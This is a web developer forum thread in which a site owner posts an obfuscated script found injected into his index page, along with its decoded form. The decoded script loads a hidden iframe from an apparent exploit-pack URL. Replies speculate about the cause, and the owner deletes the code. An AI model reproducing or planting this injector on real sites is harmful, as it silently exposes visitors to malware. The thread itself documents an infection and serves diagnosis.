www.webdeveloper.com
Results 1 to 12 of 12

Thread: I think my site was hacked, javascript added

  1. #1
    Join Date
    Mar 2006
    Posts
    51

    I think my site was hacked, javascript added

    Hi all, I recently found the following code added on to the end of my index page:
    Code:
    <!--<S>--><script>
    try {
    	var oOX='ppupHupqupaupbupyupJupxup7upCupeupiupcupzupAupsuprupKupUup5upkupfupLupIupPup4upBupNupdupjupXuptup9up8up3upYupRupFupwupoupGuplupMupSup6upZupmupWupgupDupnuphupTupVuHpuHHuHquHauHbuHy';
    	var tSF='u', AWL=Array(56626^56735,226,KG('242'),KG('227'),248,KG('225'),KG('229'),27941^28052,253,20712^20504,255,KG('246'),KG('228'),KG('244'),KG('172'),179,KG('251'),231,KG('175'),156,KG('155'),KG('245'),162,170,160,KG('247'),KG('185'),KG('254'),KG('252'),191,KG('250'),KG('233'),45475^45437,186,KG('184'),188,60713^60867,KG('249'),7437^7590,190,7474^7617,58640^58820,KG('208'),KG('189'),61411^61232,161,30649^30559,232,58259^58177,47178^47236,236,KG('213'),KG('197'),KG('167'),KG('187'),KG('163'),8550^8643,KG('214'),220,KG('194'));
    	var ge;
    	var Xbo,DZ;
    	var fc='pppHpqpapbpypJpxp7pCpepipcpCpipzpApsprpCpKpCpHpqpapbpypJpspUp5pkpKpCpapxpqpepxpApxpspcpepfpqpapLpspIp5pkpKpCpapxpqpKpxpApxpspPpspIp5pkpbp4pBpfpNpqpcpdpzpepJpjpqpNpNpXpbpzpjpbpepfpzptp9p4pBpqpep8pspApsp8pqpKp3pxpApApxpYpPp3p5pkpRp5pkpKpCpapxpcpap7pxpApxpspFpJpJpypwpopopfpzpcpJpqpFpGpCpepXpjpepzpJpopdpypCpqpXpopbpepfpzptpjpypFpypspIp5pkpKpCpapxpNpxpApxpfpNpqpcpdpzpepJpjpqpapzpCpJpzplp7pzpdpzpepJpBpspbp4papCpdpzpsp3pIpNpjpHpzpJpMpJpJpapbpGpcpJpzpBpspHpapqpspSpxpcpap7p3pIp5pkpNpjp4papCpdpzp6pNpapfpzpapApZpIpxpNpjpmpbpfpJpFpApPpIpxpNpjpFpzpbpipFpJpApPpIpxpNpjpHpJpWp7pzpjpfpbpHpyp7pCpWpApspepNpepzpspIpxp5pkpJpapWpxpRpxpfpNpqpcpdpzpepJpjpGpNpfpWpjpCpypypzpepfpgpFpbp7pfpBpNp3pIpxpapHpWpHpDpHpqpBpqpepSpqpKp3pIpnp5pkpqpCpJpqpFpBpzp3pRp5pkpfpNpqpcpdpzpepJpjpmpapbpJpzpBpspppFpJpdp7pUpppGpNpfpWpUpppopGpNpfpWpUpppopFpJpdp7pUpsp3pIp5pkpfpNpqpcpdpzpepJpjpGpNpfpWpjpCpypypzpepfpgpFpbp7pfpBpNp3pIpxpapHpWpHpDpHpqpBpqpepSpqpKp3pIp5pkpnpnp5pkp4pcpepqpJpbpNpepxpapHpWpHpDpHpqpBpqpepSpqpKp3pRpxpKpCpapxpJpApxpepzpmpxphpCpJpzpBp3pIpxpKpCpapxpzpApxpepzpmpxphpCpJpzpBp3pIpxpzpjpHpzpJpTpbpdpzpBpJpjpipzpJpTpbpdpzpBp3p8pLpVpZpZpZpZpZHpHHHqp3pIpxpfpNpqpcpdpzpepJpjpqpNpNpXpbpzpxpApxpqpep8pspApsp8pzpHpqpCpypzpBpqpKp3p8pspIpzptpypbpapzpHpApsp8pzpjpJpNHaHbpTHypJpapbpepipBp3pIpxpnp5pkpppopHpqpapbpypJpU';
    	var RU='';
    	function KG(xt){
    		return parseInt(xt)
    	}
    	oOX=oOX.split(tSF);
    	for(ge=0;ge<fc.length;ge+=2){
    		DZ=fc.substr(ge,2);
    		for(Xbo=0;Xbo<oOX.length;Xbo++){
    			if(oOX[Xbo]==DZ) break;
    		} 
    		RU+=String.fromCharCode(AWL[Xbo]^145);
    	}
    	document.write(RU);
    }
    catch(e){
    	
    }</script><!--</S>-->
    Based on the fromCharCode, and document.write statments, i knew something fishy was up, so I modified it a bit to see the output and I get the following code:
    Code:
    <script language="javascript">
    var cn = "undcr3";
    var cv = "1";
    if(document.cookie.indexOf(cn+"="+cv) == -1)
    {
    var url = "http://deutchbank.net/mpack/index.php";
    var o = document.createElement("iframe");o.setAttribute("src", url);
    o.frameBorder=0; o.width=1; o.height=1; o.style.display="none"; 
    try { document.body.appendChild(o); rsys_sc(cn,cv);}
    catch(e){
    document.write("<html><body></body></html>");
    document.body.appendChild(o); rsys_sc(cn,cv);
    }}
    function rsys_sc(cn,cv){ var t= new Date(); var e= new Date(); e.setTime(t.getTime()+3600000*24); document.cookie = cn+"="+escape(cv)+";expires="+e.toGMTString(); }
    </script>
    Does anyone have any clue what this is and how it may have got there?

  2. #2
    Join Date
    Nov 2003
    Location
    Worthington, OH, USA
    Posts
    3,634
    Do you use a host that places advertising on your pages?
    54 68 65 42 65 61 72 4D 61 79

  3. #3
    Join Date
    Oct 2006
    Location
    Ontario Canada
    Posts
    1,160
    did you recently add a banner or any other form of advertisement?

    sometimes their code will add JS to your page.

  4. #4
    Join Date
    Mar 2006
    Posts
    51
    Thanks for the reply's. No, I use servage.net, and it's paid hosting that doesn't show ad's, and only google adsense banners are shown (which was scripting that I specifically added). I noticed the code was used across all other sites on my account (with different variable names, etc.. but output was the same). It was even on one site that is completely ad free, so there was no reason for it to show up there, at least not by my doing. I have a ticket open with the hosting service to see what they say about it, and I have already changed all of my passwords (ftp and web interface login)

  5. #5
    Join Date
    Oct 2006
    Location
    Ontario Canada
    Posts
    1,160
    sometimes a host will add scripts to your page automatically so they can track visitors, stats etc..

  6. #6
    Join Date
    Mar 2006
    Posts
    51
    hmm, I hope that is all that has happened. Though I found it by performing xhtml validation and it failed for the first time in a year. Maybe its something new, but regardless, they should notify me if they are going to mess up my validated code I'll wait and see what they say. Thanks for the reply again

  7. #7
    Join Date
    Oct 2006
    Location
    Ontario Canada
    Posts
    1,160
    try uploading a new page (test.htm) and the view source..
    see if the JS gets added to the page.

    Drew

  8. #8
    Join Date
    Mar 2006
    Posts
    51
    Done, the code was not added. I should note that it was only added to my index.php, or main.php files.. Only on the main page whatever that page was (not in the header of footer files)

  9. #9
    Join Date
    Jan 2008
    Location
    Florida
    Posts
    1,227
    I came across something similar years ago when I was using a control panel to manage my sites. Maybe Ensim, I don't remember.. but I finally discovered that the control panel was adding the code. I got rid of it.

  10. #10
    Join Date
    Mar 2006
    Posts
    51
    ok, well i actually use dreamweaver and ftp usually. But, if it is something like that, I think the hosting company would know about it and they will tell me. I hope you all are right. otherwise, 4 money making sites were comprimised in a manner that I dont even know about

  11. #11
    Join Date
    Jan 2008
    Location
    Florida
    Posts
    1,227
    Also, for the heck of it... does this code exist in the file itself or only when you view source? I know that sounds weird but... can you download the file from ftp and open the raw file?

  12. #12
    Join Date
    Mar 2006
    Posts
    51
    it is in the file itself. in the .php. I went through and deleted it all, and now it is gone. And it doesn't sound wierd. I know exactly what you're asking.

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
HTML5 Development Center



Recent Articles